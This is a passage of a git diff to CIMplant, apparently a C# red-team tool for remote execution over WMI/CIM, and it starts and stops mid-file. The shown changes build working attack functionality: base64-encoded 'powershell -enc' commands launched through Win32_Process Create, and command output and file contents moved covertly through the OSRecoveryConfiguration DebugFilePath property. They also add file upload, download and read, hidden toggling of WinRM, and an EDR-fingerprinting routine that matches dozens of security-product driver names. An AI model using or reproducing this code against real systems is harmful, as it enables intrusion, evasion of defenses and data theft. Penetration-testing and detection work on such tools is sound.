= + Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); + string fullCommand = "powershell -enc " + encodedCommandB64; + + CimMethodParametersCollection cimParams = new CimMethodParametersCollection + { + CimMethodParameter.Create("CommandLine", fullCommand, CimFlags.In) + }; + + if (noDebugCheck) { - Console.WriteLine(e); + // operation options for timeout + CimOperationOptions operationOptions = new CimOperationOptions + { + Timeout = TimeSpan.FromMilliseconds(10000), + }; + + // Let's create a new instance + CimInstance cimInstance = new CimInstance("Win32_Process"); + cimSession.InvokeMethod(Namespace, cimInstance, "Create", cimParams, operationOptions); + Thread.Sleep(20000); } - return true; + else + cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); } + // Give it a second to write + Thread.Sleep(1000); - // Create the parameters and create the new process. Broken out to make it easier to follow what's up - string encodedCommand = "$data = (" + command + - " | Out-String).Trim(); $encdata = [Int[]][Char[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - var encodedCommandB64 = - Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - string fullCommand = "powershell -enc " + encodedCommandB64; - CimMethodParametersCollection cimParams = new CimMethodParametersCollection - { - CimMethodParameter.Create("CommandLine", fullCommand, CimFlags.In) - }; + // Give it a second to write and check for changes to DebugFilePath + Thread.Sleep(1000); - if (noDebugCheck) + if (!noDebugCheck) { - // operation options for timeout - CimOperationOptions operationOptions = new CimOperationOptions + CheckForFinishedDebugFilePath(originalWmiProperty, cimSession); + + //Get the contents of the file in the DebugFilePath prop + string[] commandOutput = GetOsRecovery(cimSession).Split(','); + StringBuilder output = new StringBuilder(); + + //Print output. + foreach (string integer in commandOutput) { - Timeout = TimeSpan.FromMilliseconds(10000), - }; + try + { + char a = (char)Convert.ToInt32(integer); + output.Append(a); + } + catch + { + //pass + } + } - // Let's create a new instance - CimInstance cimInstance = new CimInstance("Win32_Process"); - cimSession.InvokeMethod(Namespace, cimInstance, "Create", cimParams, operationOptions); - Thread.Sleep(20000); + Console.WriteLine(output); } - else - cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); - } - - // Give it a second to write - Thread.Sleep(1000); + Console.WriteLine("New process spawned, not checking for output"); + SetOsRecovery(cimSession, originalWmiProperty); - // Give it a second to write and check for changes to DebugFilePath - Thread.Sleep(1000); + } - if (!noDebugCheck) + else { - CheckForFinishedDebugFilePath(originalWmiProperty, cimSession); - - //Get the contents of the file in the DebugFilePath prop - string[] commandOutput = GetOsRecovery(cimSession).Split(','); - StringBuilder output = new StringBuilder(); + Console.WriteLine("Shhh...Not using PS"); - //Print output. - foreach (string integer in commandOutput) - { - try - { - char a = (char) Convert.ToInt32(integer); - output.Append(a); - } - catch + // Create the parameters and create the new process. + CimMethodParametersCollection cimParams = new CimMethodParametersCollection { - //pass - } - } + CimMethodParameter.Create("CommandLine", planter.Commander.Execute, CimFlags.In) + }; - Console.WriteLine(output); - } - else - Console.WriteLine("New process spawned, not checking for output"); + CimMethodResult results = cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); - SetOsRecovery(cimSession, originalWmiProperty); + Console.WriteLine(Convert.ToUInt32(results.ReturnValue.Value.ToString()) == 0 + ? "Successfully created process" + : "Issues creating process"); + } return true; } @@ -1006,50 +1329,64 @@ public object disable_winrm(Planter planter) { CimSession cimSession = planter.Connector.ConnectedCimSession; - // Create the parameters and create the new process. - CimMethodParametersCollection cimParams = new CimMethodParametersCollection + if (!planter.Commander.NoPS) { - CimMethodParameter.Create("CommandLine", "powershell -w hidden -command \"Disable-PSRemoting -Force\"", - CimFlags.In) - }; - - // We only need the first instance - CimMethodResult results = - cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); + // Create the parameters and create the new process. + CimMethodParametersCollection cimParams = new CimMethodParametersCollection + { + CimMethodParameter.Create("CommandLine", "powershell -w hidden -command \"Disable-PSRemoting -Force\"", + CimFlags.In) + }; - // Give it a second to write - Thread.Sleep(1000); + // We only need the first instance + CimMethodResult results = + cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); - Console.WriteLine(Convert.ToUInt32(results.ReturnValue.Value.ToString()) == 0 - ? "Successfully disabled WinRM" - : "Issues disabling WinRM"); + // Give it a second to write + Thread.Sleep(1000); - return true; + Console.WriteLine(Convert.ToUInt32(results.ReturnValue.Value.ToString()) == 0 + ? "Successfully disabled WinRM" + : "Issues disabling WinRM"); + return true; + } + else + { + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); + return null; + } } public object enable_winrm(Planter planter) { CimSession cimSession = planter.Connector.ConnectedCimSession; - // Create the parameters and create the new process. - CimMethodParametersCollection cimParams = new CimMethodParametersCollection + if (!planter.Commander.NoPS) { - CimMethodParameter.Create("CommandLine", "powershell -w hidden -command \"Enable-PSRemoting -Force\"", - CimFlags.In) - }; - - // We only need the first instance - CimMethodResult results = - cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); + // Create the parameters and create the new process. + CimMethodParametersCollection cimParams = new CimMethodParametersCollection + { + CimMethodParameter.Create("CommandLine", "powershell -w hidden -command \"Enable-PSRemoting -Force\"", + CimFlags.In) + }; - // Give it a second to write - Thread.Sleep(1000); + // We only need the first instance + CimMethodResult results = + cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); - Console.WriteLine(Convert.ToUInt32(results.ReturnValue.Value.ToString()) == 0 - ? "Successfully enabled WinRM" - : "Issues enabled WinRM"); + // Give it a second to write + Thread.Sleep(1000); - return true; + Console.WriteLine(Convert.ToUInt32(results.ReturnValue.Value.ToString()) == 0 + ? "Successfully enabled WinRM" + : "Issues enabled WinRM"); + return true; + } + else + { + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); + return null; + } } public object registry_mod(Planter planter) @@ -1655,23 +1992,48 @@ public object ps(Planter planter) const string query = "SELECT * FROM Win32_Process"; IEnumerable queryInstance = cimSession.QueryInstances(Namespace, "WQL", query); - Console.WriteLine("{0,-35}{1,15}", "Name", "Handle"); - Console.WriteLine("{0,-35}{1,15}", "-----------", "---------"); + Console.WriteLine("{0,-50}{1,15}", "Name", "Handle"); + Console.WriteLine("{0,-50}{1,15}", "-----------", "---------"); foreach (CimInstance cimObject in queryInstance) { string name = cimObject.CimInstanceProperties["Name"].Value.ToString(); - if (name.Length > 30) - name = Truncate(name, 30) + "..."; + if (name.Length > 45) + name = Truncate(name, 45) + "..."; try { - Console.WriteLine("{0,-35}{1,15}", name, cimObject.CimInstanceProperties["Handle"].Value); + if (Messenger.AVs.Any(name.ToLower().Equals)) + { + // Make AV/EDR pop + if (Console.BackgroundColor == ConsoleColor.Black) + { + Console.ForegroundColor = ConsoleColor.Red; + Console.WriteLine("{0,-50}{1,15}", name, cimObject.CimInstanceProperties["Handle"].Value); + Console.ResetColor(); + } + } + else if (Messenger.Admin.Any(name.ToLower().Equals)) + { + // Make AV/EDR pop + if (Console.BackgroundColor == ConsoleColor.Black) + { + Console.ForegroundColor = ConsoleColor.Cyan; + Console.WriteLine("{0,-35}{1,15}", name, cimObject.CimInstanceProperties["Handle"].Value); + Console.ResetColor(); + } + } + else + Console.WriteLine("{0,-35}{1,15}", name, cimObject.CimInstanceProperties["Handle"].Value); + } catch { //value probably doesn't exist, so just pass } } + + Messenger.BlueMessage("\nDenotes a potential admin tool"); + Messenger.ErrorMessage("Denotes a potential AV/EDR product"); return queryInstance; } @@ -2033,11 +2395,6 @@ public int GetFileSize(string path, CimSession cimSession) return Convert.ToInt32(queryInstance.First().CimInstanceProperties["FileSize"].Value); } - - - - - public string CheckForFinishedDebugFilePath(string originalWmiProperty, CimSession cimSession) { bool warn = false; diff --git a/CIMplant/ExecuteWMI.cs b/CIMplant/ExecuteWMI.cs old mode 100755 new mode 100644 index ea8ffc6..fab87ae --- a/CIMplant/ExecuteWMI.cs +++ b/CIMplant/ExecuteWMI.cs @@ -301,10 +301,296 @@ public object vacant_system(Planter planter) return queryCollection; } + // Idea and some code thanks to Harley - https://github.com/harleyQu1nn/AggressorScripts/blob/master/EDR.cna + public object edr_query(Planter planter) + { + ManagementScope scope = planter.Connector.ConnectedWmiSession; + bool activeEdr = false; + + ObjectQuery fileQuery = new ObjectQuery(@"SELECT * FROM CIM_DataFile WHERE Path = '\\windows\\System32\\drivers\\'"); + ManagementObjectSearcher fileSearcher = new ManagementObjectSearcher(scope, fileQuery); + ManagementObjectCollection queryCollection = fileSearcher.Get(); + + foreach (var o in queryCollection) + { + var wmiObject = (ManagementObject)o; + string fileName = Path.GetFileName((string)wmiObject["Name"]); + + switch (fileName) + { + case "FeKern.sys": + case "WFP_MRT.sys": + Messenger.ErrorMessage("FireEye Found!"); + activeEdr = true; + break; + + case "eaw.sys": + Messenger.ErrorMessage("Raytheon Cyber Solutions Found!"); + activeEdr = true; + break; + + case "rvsavd.sys": + Messenger.ErrorMessage("CJSC Returnil Software Found!"); + activeEdr = true; + break; + + case "dgdmk.sys": + Messenger.ErrorMessage("Verdasys Inc. Found!"); + activeEdr = true; + break; + + case "atrsdfw.sys": + Messenger.ErrorMessage("Altiris (Symantec) Found!"); + activeEdr = true; + break; + + case "mbamwatchdog.sys": + Messenger.ErrorMessage("Malwarebytes Found!"); + activeEdr = true; + break; + + case "edevmon.sys": + case "ehdrv.sys": + Messenger.ErrorMessage("ESET Found!"); + activeEdr = true; + break; + + case "SentinelMonitor.sys": + Messenger.ErrorMessage("SentinelOne Found!"); + activeEdr = true; + break; + + case "edrsensor.sys": + case "hbflt.sys": + case "bdsvm.sys": + case "gzflt.sys": + case "bddevflt.sys": + case "AVCKF.SYS": + case "Atc.sys": + case "AVC3.SYS": + case "TRUFOS.SYS": + case "BDSandBox.sys": + Messenger.ErrorMessage("BitDefender Found!"); + activeEdr = true; + break; + + case "HexisFSMonitor.sys": + Messenger.ErrorMessage("Hexis Cyber Solutions Found!"); + activeEdr = true; + break; + + case "CyOptics.sys": + case "CyProtectDrv32.sys": + case "CyProtectDrv64.sys": + Messenger.ErrorMessage("Cylance Inc. Found!"); + activeEdr = true; + break; + + case "aswSP.sys": + Messenger.ErrorMessage("Avast Found!"); + activeEdr = true; + break; + + case "mfeaskm.sys": + case "mfencfilter.sys": + case "epdrv.sys": + case "mfencoas.sys": + case "mfehidk.sys": + case "swin.sys": + case "hdlpflt.sys": + case "mfprom.sys": + case "MfeEEFF.sys": + Messenger.ErrorMessage("McAfee Found!"); + activeEdr = true; + break; + + case "groundling32.sys": + case "groundling64.sys": + Messenger.ErrorMessage("Dell Secureworks Found!"); + activeEdr = true; + break; + + case "avgtpx86.sys": + case "avgtpx64.sys": + Messenger.ErrorMessage("AVG Technologies Found!"); + activeEdr = true; + break; + + case "pgpwdefs.sys": + case "GEProtection.sys": + case "diflt.sys": + case "sysMon.sys": + case "ssrfsf.sys": + case "emxdrv2.sys": + case "reghook.sys": + case "spbbcdrv.sys": + case "bhdrvx86.sys": + case "bhdrvx64.sys": + case "SISIPSFileFilter.sys": + case "symevent.sys": + case "vxfsrep.sys": + case "VirtFile.sys": + case "SymAFR.sys": + case "symefasi.sys": + case "symefa.sys": + case "symefa64.sys": + case "SymHsm.sys": + case "evmf.sys": + case "GEFCMP.sys": + case "VFSEnc.sys": + case "pgpfs.sys": + case "fencry.sys": + case "symrg.sys": + Messenger.ErrorMessage("Symantec Found!"); + activeEdr = true; + break; + + case "SAFE-Agent.sys": + Messenger.ErrorMessage("SAFE-Cyberdefense Found!"); + activeEdr = true; + break; + + case "CybKernelTracker.sys": + Messenger.ErrorMessage("CyberArk Software Found!"); + activeEdr = true; + break; + + case "klifks.sys": + case "klifaa.sys": + case "Klifsm.sys": + Messenger.ErrorMessage("Kaspersky Found!"); + activeEdr = true; + break; + + case "SAVOnAccess.sys": + case "savonaccess.sys": + case "sld.sys": + Messenger.ErrorMessage("Sophos Found!"); + activeEdr = true; + break; + + case "ssfmonm.sys": + Messenger.ErrorMessage("Webroot Software, Inc. Found!"); + activeEdr = true; + break; + + case "CarbonBlackK.sys": + case "carbonblackk.sys": + case "Parity.sys": + case "cbk7.sys": + case "cbstream.sys": + Messenger.ErrorMessage("Carbon Black Found!"); + activeEdr = true; + break; + + case "CRExecPrev.sys": + Messenger.ErrorMessage("Cybereason Found!"); + activeEdr = true; + break; + + case "im.sys": + case "CSAgent.sys": + case "CSBoot.sys": + case "CSDeviceControl.sys": + case "cspcm2.sys": + Messenger.ErrorMessage("CrowdStrike Found!"); + activeEdr = true; + break; + + case "cfrmd.sys": + case "cmdccav.sys": + case "cmdguard.sys": + case "CmdMnEfs.sys": + case "MyDLPMF.sys": + Messenger.ErrorMessage("Comodo Security Solutions Found!"); + activeEdr = true; + break; + + case "PSINPROC.SYS": + case "PSINFILE.SYS": + case "amfsm.sys": + case "amm8660.sys": + case "amm6460.sys": + Messenger.ErrorMessage("Panda Security Found!"); + activeEdr = true; + break; + + case "fsgk.sys": + case "fsatp.sys": + case "fshs.sys": + Messenger.ErrorMessage("F-Secure Found!"); + activeEdr = true; + break; + + case "esensor.sys": + Messenger.ErrorMessage("Endgame Found!"); + activeEdr = true; + break; + + case "csacentr.sys": + case "csaenh.sys": + case "csareg.sys": + case "csascr.sys": + case "csaav.sys": + case "csaam.sys": + Messenger.ErrorMessage("Cisco Found!"); + activeEdr = true; + break; + + case "TMUMS.sys": + case "hfileflt.sys": + case "TMUMH.sys": + case "AcDriver.sys": + case "SakFile.sys": + case "SakMFile.sys": + case "fileflt.sys": + case "TmEsFlt.sys": + case "tmevtmgr.sys": + case "TmFileEncDmk.sys": + Messenger.ErrorMessage("Trend Micro Inc Found!"); + activeEdr = true; + break; + + case "epregflt.sys": + case "medlpflt.sys": + case "dsfa.sys": + case "cposfw.sys": + Messenger.ErrorMessage("Check Point Software Technologies Found!"); + activeEdr = true; + break; + + case "psepfilter.sys": + case "cve.sys": + Messenger.ErrorMessage("Absolute Found!"); + activeEdr = true; + break; + + case "brfilter.sys": + Messenger.ErrorMessage("Bromium Found!"); + activeEdr = true; + break; + + case "LRAgentMF.sys": + Messenger.ErrorMessage("LogRhythm Found!"); + activeEdr = true; + break; + + case "libwamf.sys": + Messenger.ErrorMessage("OPSWAT Inc Found!"); + activeEdr = true; + break; + } + } + + if (!activeEdr) + Console.WriteLine("No EDR vendors found, tread carefully"); + + return true; + } + /////////////////////////////////////// FILE OPERATIONS ///////////////////////////////////////////////////////////////////// - // WORKING CURRENTLY BUT WITH POWERSHELL :(// public object cat(Planter planter) { ManagementScope scope = planter.Connector.ConnectedWmiSession; @@ -316,92 +602,31 @@ public object cat(Planter planter) return null; } - string originalWmiProperty = GetOsRecovery(scope); - bool wsman = true; - Messenger.GoodMessage("[+] Printing file: " + path); Messenger.GoodMessage("--------------------------------------------------------\n"); - if (wsman == true) - { - // We can modify this later easily to pass wsman if needed - using (PowerShell powershell = PowerShell.Create()) - { - try - { - if (!string.IsNullOrEmpty(planter.Password?.ToString())) - powershell.Runspace = RunspaceCreate(planter); - else - { - // Since we can't run a local runspace as admin let's just grab the file using normal c# code (pro: avoids PS) - //powershell.Runspace = RunspaceCreateLocal(); - // We might need to catch if people try to cat binary files in the future - Console.WriteLine(System.IO.File.ReadAllText(path)); - return true; - } - } - catch (System.Management.Automation.Remoting.PSRemotingTransportException) - { - wsman = false; - } - catch (UnauthorizedAccessException) - { - Messenger.ErrorMessage("[-] Error: Access to the file is denied. If running against the local system use Admin prompt."); - return null; - } - - if (powershell.Runspace.ConnectionInfo != null) - { - string command1 = "$data = (Get-Content " + path + " | Out-String).Trim()"; - const string command2 = @"$encdata = [Int[]][Char[]]$data -Join ','"; - const string command3 = - @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - - powershell.Commands.AddScript(command1, false); - powershell.Commands.AddScript(command2, false); - powershell.Commands.AddScript(command3, false); - powershell.Invoke(); - } - else - wsman = false; - } - } - - if (wsman == false) - { - // WSMAN not enabled on the remote system, use another method - ObjectGetOptions options = new ObjectGetOptions(); - ManagementPath pather = new ManagementPath("Win32_Process"); - ManagementClass classInstance = new ManagementClass(scope, pather, options); - ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); - - string encodedCommand = "$data = (Get-Content " + path + - " | Out-String).Trim(); $encdata = [Int[]][Char[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - var encodedCommandB64 = Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - - inParams["CommandLine"] = "powershell -enc " + encodedCommandB64; - ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); - } - - // Give it a second to write and check for changes to DebugFilePath - Thread.Sleep(1000); - CheckForFinishedDebugFilePath(originalWmiProperty, scope); + // https://twitter.com/mattifestation/status/1220713684756049921 but modified :) + ObjectGetOptions options = new ObjectGetOptions(); + ManagementPath pather = new ManagementPath($"\\\\{planter.Connector.SystemToConn}\\root\\Microsoft\\Windows\\Powershellv3"); + ManagementClass classInstance = new ManagementClass(scope, pather, options); + ManagementObject newInstance = classInstance.CreateInstance(); + newInstance["InstanceID"] = path; + newInstance.Put(); - //Get the contents of the file in the DebugFilePath prop - string[] fileOutput = GetOsRecovery(scope).Split(','); + ManagementObjectSearcher searcher = + new ManagementObjectSearcher("root\\Microsoft\\Windows\\Powershellv3", + $"SELECT * FROM PS_ModuleFile WHERE InstanceID = {path}"); - StringBuilder output = new StringBuilder(); - - //Print file output. - foreach (string integer in fileOutput) + foreach (ManagementObject queryObj in searcher.Get()) { - char a = (char) Convert.ToInt32(integer); - output.Append(a); + if (queryObj["FileData"] == null) + return true; + else + { + Byte[] arrFileData = (Byte[])(queryObj["FileData"]); + Console.WriteLine(Encoding.UTF8.GetString(arrFileData, 0, arrFileData.Length)); + } } - - Console.WriteLine(output); - SetOsRecovery(scope, originalWmiProperty); - return true; } @@ -469,93 +694,101 @@ public object download(Planter planter) Messenger.GoodMessage("[+] Downloading file: " + downloadPath); Messenger.GoodMessage("--------------------------------------------------------\n"); - - if (wsman == true) + + if (!planter.Commander.NoPS) { - // We can modify this later easily to pass wsman if needed - using (PowerShell powershell = PowerShell.Create()) + if (wsman == true) { - try + // We can modify this later easily to pass wsman if needed + using (PowerShell powershell = PowerShell.Create()) { - if (!string.IsNullOrEmpty(planter.Password?.ToString())) - powershell.Runspace = RunspaceCreate(planter); - else - powershell.Runspace = RunspaceCreateLocal(); - } - catch (System.Management.Automation.Remoting.PSRemotingTransportException) - { - wsman = false; - } + try + { + if (!string.IsNullOrEmpty(planter.Password?.ToString())) + powershell.Runspace = RunspaceCreate(planter); + else + powershell.Runspace = RunspaceCreateLocal(); + } + catch (System.Management.Automation.Remoting.PSRemotingTransportException) + { + wsman = false; + } - if (powershell.Runspace.ConnectionInfo != null) - { - string command1 = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + "'"; - const string command2 = @"$encdata = [Int[]][byte[]]$data -Join ','"; - const string command3 = - @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - - powershell.Commands.AddScript(command1, false); - powershell.Commands.AddScript(command2, false); - powershell.Commands.AddScript(command3, false); - powershell.Invoke(); + if (powershell.Runspace.ConnectionInfo != null) + { + string command1 = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + "'"; + const string command2 = @"$encdata = [Int[]][byte[]]$data -Join ','"; + const string command3 = + @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; + + powershell.Commands.AddScript(command1, false); + powershell.Commands.AddScript(command2, false); + powershell.Commands.AddScript(command3, false); + powershell.Invoke(); + } + else + wsman = false; } - else - wsman = false; } - } - if (wsman == false) - { - // WSMAN not enabled on the remote system, use another method - ObjectGetOptions options = new ObjectGetOptions(); - ManagementPath pather = new ManagementPath("Win32_Process"); - ManagementClass classInstance = new ManagementClass(scope, pather, options); - ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); + if (wsman == false) + { + // WSMAN not enabled on the remote system, use another method + ObjectGetOptions options = new ObjectGetOptions(); + ManagementPath pather = new ManagementPath("Win32_Process"); + ManagementClass classInstance = new ManagementClass(scope, pather, options); + ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); - string encodedCommand = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + - "'; $encdata = [Int[]][byte[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - var encodedCommandB64 = - Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - - string fullCommand = "powershell -enc " + encodedCommandB64; + string encodedCommand = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + + "'; $encdata = [Int[]][byte[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; + var encodedCommandB64 = + Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - inParams["CommandLine"] = fullCommand; + string fullCommand = "powershell -enc " + encodedCommandB64; - ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); + inParams["CommandLine"] = fullCommand; - } + ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); - // Give it a second to write and check for changes to DebugFilePath - Thread.Sleep(1000); - CheckForFinishedDebugFilePath(originalWmiProperty, scope); + } - //Get the contents of the file in the DebugFilePath prop - string[] fileOutput = GetOsRecovery(scope).Split(','); + // Give it a second to write and check for changes to DebugFilePath + Thread.Sleep(1000); + CheckForFinishedDebugFilePath(originalWmiProperty, scope); - //Create list for bytes - List outputList = new List(); + //Get the contents of the file in the DebugFilePath prop + string[] fileOutput = GetOsRecovery(scope).Split(','); - //Convert from int (bytes) to byte - foreach (string integer in fileOutput) - { - try - { - byte a = (byte) Convert.ToInt32(integer); - outputList.Add(a); - } - catch + //Create list for bytes + List outputList = new List(); + + //Convert from int (bytes) to byte + foreach (string integer in fileOutput) { - //pass + try + { + byte a = (byte)Convert.ToInt32(integer); + outputList.Add(a); + } + catch + { + //pass + } } - } - //Save to local dir if no directory specified - if (string.IsNullOrEmpty(writePath)) - writePath = Path.GetFileName(downloadPath); + //Save to local dir if no directory specified + if (string.IsNullOrEmpty(writePath)) + writePath = Path.GetFileName(downloadPath); - File.WriteAllBytes(writePath, outputList.ToArray()); + File.WriteAllBytes(writePath, outputList.ToArray()); + + SetOsRecovery(scope, originalWmiProperty); + } + else + { + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); + } - SetOsRecovery(scope, originalWmiProperty); return true; } @@ -679,82 +912,90 @@ public object upload(Planter planter) Messenger.GoodMessage("[+] Uploading file: " + uploadFile + " to " + writePath); Messenger.GoodMessage("--------------------------------------------------------------------\n"); - List intList = new List(); - byte[] uploadFileBytes = File.ReadAllBytes(uploadFile); - - //Convert from byte to int (bytes) - foreach (byte uploadByte in uploadFileBytes) + if (!planter.Commander.NoPS) { - int a = uploadByte; - intList.Add(a); - } + List intList = new List(); + byte[] uploadFileBytes = File.ReadAllBytes(uploadFile); - SetOsRecovery(scope, string.Join(",", intList)); + //Convert from byte to int (bytes) + foreach (byte uploadByte in uploadFileBytes) + { + int a = uploadByte; + intList.Add(a); + } - // Give it a second to write and check for changes to DebugFilePath - Thread.Sleep(1000); - CheckForFinishedDebugFilePath(originalWmiProperty, scope); + SetOsRecovery(scope, string.Join(",", intList)); - if (wsman == true) - { - // We can modify this later easily to pass wsman if needed - using (PowerShell powershell = PowerShell.Create()) + // Give it a second to write and check for changes to DebugFilePath + Thread.Sleep(1000); + CheckForFinishedDebugFilePath(originalWmiProperty, scope); + + if (wsman == true) { - try - { - if (!string.IsNullOrEmpty(planter.Password?.ToString())) - powershell.Runspace = RunspaceCreate(planter); - else - powershell.Runspace = RunspaceCreateLocal(); - } - catch (System.Management.Automation.Remoting.PSRemotingTransportException) + // We can modify this later easily to pass wsman if needed + using (PowerShell powershell = PowerShell.Create()) { - wsman = false; - } + try + { + if (!string.IsNullOrEmpty(planter.Password?.ToString())) + powershell.Runspace = RunspaceCreate(planter); + else + powershell.Runspace = RunspaceCreateLocal(); + } + catch (System.Management.Automation.Remoting.PSRemotingTransportException) + { + wsman = false; + } - if (powershell.Runspace.ConnectionInfo != null) - { - const string command1 = - @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath"; - const string command2 = @"$decode = [byte[]][int[]]$encdata.Split(',') -Join ' '"; - string command3 = - @"[byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + - writePath + "' -Value $decoded"; - - powershell.Commands.AddScript(command1, false); - powershell.Commands.AddScript(command2, false); - powershell.Commands.AddScript(command3, false); - powershell.Invoke(); + if (powershell.Runspace.ConnectionInfo != null) + { + const string command1 = + @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath"; + const string command2 = @"$decode = [byte[]][int[]]$encdata.Split(',') -Join ' '"; + string command3 = + @"[byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + + writePath + "' -Value $decoded"; + + powershell.Commands.AddScript(command1, false); + powershell.Commands.AddScript(command2, false); + powershell.Commands.AddScript(command3, false); + powershell.Invoke(); + } + else + wsman = false; } - else - wsman = false; } - } - if (wsman == false) - { - // WSMAN not enabled on the remote system, use another method - ObjectGetOptions options = new ObjectGetOptions(); - ManagementPath pather = new ManagementPath("Win32_Process"); - ManagementClass classInstance = new ManagementClass(scope, pather, options); - ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); + if (wsman == false) + { + // WSMAN not enabled on the remote system, use another method + ObjectGetOptions options = new ObjectGetOptions(); + ManagementPath pather = new ManagementPath("Win32_Process"); + ManagementClass classInstance = new ManagementClass(scope, pather, options); + ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); - string encodedCommand = - "$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath; $decode = [byte[]][int[]]$encdata.Split(',') -Join ' '; [byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + - writePath + "' -Value $decoded"; - var encodedCommandB64 = - Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); + string encodedCommand = + "$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath; $decode = [byte[]][int[]]$encdata.Split(',') -Join ' '; [byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + + writePath + "' -Value $decoded"; + var encodedCommandB64 = + Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - inParams["CommandLine"] = "powershell -enc " + encodedCommandB64; + inParams["CommandLine"] = "powershell -enc " + encodedCommandB64; - ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); + ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); - // Give it a second to write - Thread.Sleep(1000); + // Give it a second to write + Thread.Sleep(1000); + } + + // Set OSRecovery back to normal pls + SetOsRecovery(scope, originalWmiProperty); + } + else + { + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); } - // Set OSRecovery back to normal pls - SetOsRecovery(scope, originalWmiProperty); return true; } @@ -780,160 +1021,180 @@ public object command_exec(Planter planter) Messenger.GoodMessage("[+] Executing command: " + planter.Commander.Execute); Messenger.GoodMessage("--------------------------------------------------------\n"); - if (wsman == true) + if (!planter.Commander.NoPS) { - // We can modify this later easily to pass wsman if needed - using (PowerShell powershell = PowerShell.Create()) + if (wsman == true) { - try + // We can modify this later easily to pass wsman if needed + using (PowerShell powershell = PowerShell.Create()) { - if (!string.IsNullOrEmpty(planter.System?.ToString())) - powershell.Runspace = RunspaceCreate(planter); - else + try { - powershell.Runspace = RunspaceCreateLocal(); - powershell.AddCommand(command); - Collection result = powershell.Invoke(); - foreach (PSObject a in result) + if (!string.IsNullOrEmpty(planter.System?.ToString())) + powershell.Runspace = RunspaceCreate(planter); + else { - Console.WriteLine(a); + powershell.Runspace = RunspaceCreateLocal(); + powershell.AddCommand(command); + Collection result = powershell.Invoke(); + foreach (PSObject a in result) + { + Console.WriteLine(a); + } + + return true; } - - return true; } - } - catch (System.Management.Automation.Remoting.PSRemotingTransportException) - { - wsman = false; - goto GetOut; // Do this so we're not doing below work when we don't need to - } - - if (powershell.Runspace.ConnectionInfo != null) - { - string command1 = "$data = (" + command + " | Out-String).Trim()"; - const string command2 = @"$encdata = [Int[]][Char[]]$data -Join ','"; - const string command3 = - @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - - powershell.Commands.AddScript(command1, false); - powershell.Commands.AddScript(command2, false); - powershell.Commands.AddScript(command3, false); + catch (System.Management.Automation.Remoting.PSRemotingTransportException) + { + wsman = false; + goto GetOut; // Do this so we're not doing below work when we don't need to + } - // If running powershell.exe let's run it and not worry about the output otherwise it will hang for very long time - if (noDebugCheck) + if (powershell.Runspace.ConnectionInfo != null) { - // start the timer and get a timeout - DateTime startTime = DateTime.Now; - IAsyncResult asyncPs = powershell.BeginInvoke(); + string command1 = "$data = (" + command + " | Out-String).Trim()"; + const string command2 = @"$encdata = [Int[]][Char[]]$data -Join ','"; + const string command3 = + @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - while (asyncPs.IsCompleted 